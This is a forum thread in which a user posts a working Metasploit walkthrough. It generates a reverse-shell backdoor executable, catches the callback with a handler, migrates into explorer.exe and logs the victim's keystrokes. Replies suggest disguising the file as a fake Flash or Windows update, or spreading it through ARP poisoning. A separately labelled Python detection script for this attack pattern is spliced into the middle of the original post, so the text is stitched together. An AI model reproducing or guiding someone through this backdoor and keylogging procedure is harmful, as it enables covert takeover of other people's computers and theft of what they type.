Author Topic: How i Hacked into win7 sp1.  (Read 21419 times)

ultra_lazer

  • Guest
on: January 11, 2012, 08:27:00 AM
Hi there everyone.
I got a 2nd machine at home running Win7, mostly used for gaming. Last night I received an SP1 update along with several security updates that followed, so I decided to try my luck and attempt to hack into it. It worked; this is in detail how I did it:

Step 1: ultralazer@backbox:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST="your local ip" LPORT="any port you wish" x > /root/backdoor.exe


Your local IP is the one you noted earlier, and for the port you could select 4444.
(Everything has to be entered without quotes.)

You should get something like this:

Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.0.23 ,LPORT=4444
ultralazer@backbox:/opt/metasploit3/msf3#


Also, now on your backbox desktop, you would be seeing a backdoor.exe file.


After executing the backdoor.exe on your slave's computer follow these steps:
Now open the 1st shell window with msfconsole in it.
msf >
Type the following:

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.0.23
LHOST => 192.168.0.23
msf exploit(handler) > set LPORT 4444
LPORT => 4444



All the connections are done. You have already made an executable file which makes a reverse connection to you,
and now you have set the meterpreter handler to listen for it on port 4444.
The last step you have to do now is to type in "exploit" and press enter:
msf exploit(handler) > exploit



You would see a meterpreter prompt like this:
meterpreter >
meterpreter > sessions -i

Type in ps to list the active processes:
meterpreter > ps


Search for explorer.exe and migrate to that process:
meterpreter > migrate 5716
Migrating to 5716...
Migration completed successfully.

meterpreter >



Type in the following:
meterpreter > use priv
Now, if you want to start the keylogger activity on the slave, just type keyscan_start.


Now, if you want to go to the slave's computer,
just type shell:
meterpreter > shell
Process 5428 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright © 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>


You would now have a command prompt.
Type in whoami to see the slave's computer name:
C:\Windows\system32>whoami
whoami
win7-pc\win 7
C:\Windows\system32>



Let's say the slave has typed in anything on his computer.
Just type exit to return to meterpreter.
Now type in keyscan_dump to see all the typed keystrokes:
meterpreter > keyscan_dump
Dumping captured keystroke

;D I will be installing Win8 soon and I will try this exploit on it, then I will let you all know. ;D

Ultra_Lazer
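From the defender's side, the sequence in the post leaves a recognisable trail on the Windows host: a freshly dropped executable in a user-writable folder opens an outbound TCP connection to an unusual port (the reverse_tcp callback to 4444), a remote thread is created in explorer.exe (the "migrate" step), and from then on explorer.exe itself holds that connection. The following is an added example, not code from the original post or from the BackBox project: it runs three behavioural rules over Sysmon-style process and network events. The event schema (dicts with event_id 3 for network connections and event_id 8 for CreateRemoteThread), the field names, the tolerated-port set and all sample events are assumptions constructed for this example; the paths and port mirror the values shown in the post.

```python
"""Detect the reverse-shell-plus-migration pattern from the post above.

Added example; the simplified Sysmon-like schema below is an assumption:
  event_id 3: {"pid", "image", "dest_ip", "dest_port"}            network connection
  event_id 8: {"source_pid", "source_image", "target_pid", "target_image"}  CreateRemoteThread
"""
from dataclasses import dataclass
from typing import Iterable, List

# Folders an ordinary user can write to; a dropped file such as the post's
# backdoor.exe / Adobe-flash-update.exe would normally run from one of these.
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")

# Outbound ports we accept from explorer.exe without alerting (assumption:
# web and SMB traffic are normal for the shell, a raw 4444 callback is not).
EXPECTED_EXPLORER_PORTS = {80, 443, 445}


@dataclass(frozen=True)
class Alert:
    rule: str
    pid: int
    detail: str


def _is_explorer(image: str) -> bool:
    return image.lower().endswith("\\explorer.exe")


def detect(events: Iterable[dict]) -> List[Alert]:
    """Apply the three rules in event order and return every alert raised."""
    alerts: List[Alert] = []
    for ev in events:
        if ev["event_id"] == 3:
            image = ev["image"]
            where = f"{image} -> {ev['dest_ip']}:{ev['dest_port']}"
            if image.lower().startswith(USER_WRITABLE_PREFIXES):
                # Rule 1: executable in a user-writable folder talks outbound.
                alerts.append(Alert("user_dir_exe_outbound", ev["pid"], where))
            elif _is_explorer(image) and ev["dest_port"] not in EXPECTED_EXPLORER_PORTS:
                # Rule 3: explorer.exe holding a connection on an unexpected port
                # is what a migrated meterpreter session looks like.
                alerts.append(Alert("explorer_unusual_port", ev["pid"], where))
        elif ev["event_id"] == 8:
            # Rule 2: a remote thread injected into explorer.exe from another
            # process corresponds to the "migrate <pid>" step.
            if ev["source_pid"] != ev["target_pid"] and _is_explorer(ev["target_image"]):
                alerts.append(Alert(
                    "remote_thread_into_explorer", ev["source_pid"],
                    f"{ev['source_image']} -> {ev['target_image']} (pid {ev['target_pid']})"))
    return alerts


# Constructed sample feed: one benign browser connection, the dropped file
# calling back to the handler, the migration into explorer.exe, explorer.exe
# continuing the callback, and a benign file-share connection from explorer.exe.
DROPPED = "C:\\Users\\win 7\\Downloads\\Adobe-flash-update.exe"
EXPLORER = "C:\\Windows\\explorer.exe"
SAMPLE_EVENTS = [
    {"event_id": 3, "pid": 3012, "image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "dest_ip": "203.0.113.5", "dest_port": 443},
    {"event_id": 3, "pid": 4120, "image": DROPPED, "dest_ip": "192.168.0.23", "dest_port": 4444},
    {"event_id": 8, "source_pid": 4120, "source_image": DROPPED,
     "target_pid": 5716, "target_image": EXPLORER},
    {"event_id": 3, "pid": 5716, "image": EXPLORER, "dest_ip": "192.168.0.23", "dest_port": 4444},
    {"event_id": 3, "pid": 5716, "image": EXPLORER, "dest_ip": "192.168.0.10", "dest_port": 445},
]


def run_demo() -> List[Alert]:
    """Run the rules over the constructed feed; expect exactly three alerts."""
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for alert in run_demo():
        print(f"[{alert.rule}] pid={alert.pid} {alert.detail}")
```

The three rules fire on the two benign-looking connections only when combined with context (user-writable origin, unexpected port), so a browser on 443 or explorer.exe on 445 passes silently; in a real deployment the port allow-list and path prefixes would be tuned to the environment rather than hard-coded.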



berghem

  • Jr. Member
  • Posts: 97
  • http://lorenzistefano.com
Reply #1 on: January 11, 2012, 09:01:27 AM
Thanks, it's very nice!


break0x90

  • Newbie
  • Posts: 30
Reply #2 on: January 12, 2012, 05:46:44 PM
ultra_lazer, this is funny... the curiosity is how to get backdoor.exe run by the victim...



ultra_lazer

  • Guest
Reply #3 on: January 12, 2012, 06:17:42 PM
Hi
"Backdoor" was an example; originally it was named "Adobe-flash-update.exe".
Use your fantasy!! ;)



break0x90

  • Newbie
  • Posts: 30
Reply #4 on: January 13, 2012, 09:25:54 AM
Yep, but... I think it is necessary to force a fake Windows update or antivirus update... or to use a proxy with an ARP poisoning attack :)



li9h7

  • Guest
Reply #5 on: February 22, 2012, 08:13:22 AM
thanks... nice



xeeoz

  • Newbie
  • Posts: 1
Reply #6 on: April 22, 2012, 05:31:32 PM
Hey, I'm kinda new to all this stuff....
Do you type the first commands in the terminal or the msf shell?


bash: /opt/metasploit3/msf3#: No such file or directory


Sorry, I'm new :(



ostendali

  • Global Moderator
  • Hero Member
  • Posts: 587
Reply #7 on: April 23, 2012, 04:05:02 PM
Hey, I'm kinda new to all this stuff....
Do you type the first commands in the terminal or the msf shell?


bash: /opt/metasploit3/msf3#: No such file or directory


Sorry, I'm new :(
RTFM before asking such questions around here....
Please read the forum disclaimer carefully here: http://forum.backbox.org/announcements/general-forum-conditions/



Anti

  • Newbie
  • Posts: 1
Reply #8 on: October 14, 2012, 12:39:04 AM
Hey Lazer, can I translate your article and post it on my blog?



ltdan

  • Guest
Reply #9 on: April 29, 2013, 02:39:02 AM
Thanks for the post ultra_lazer, worked on it today.

lt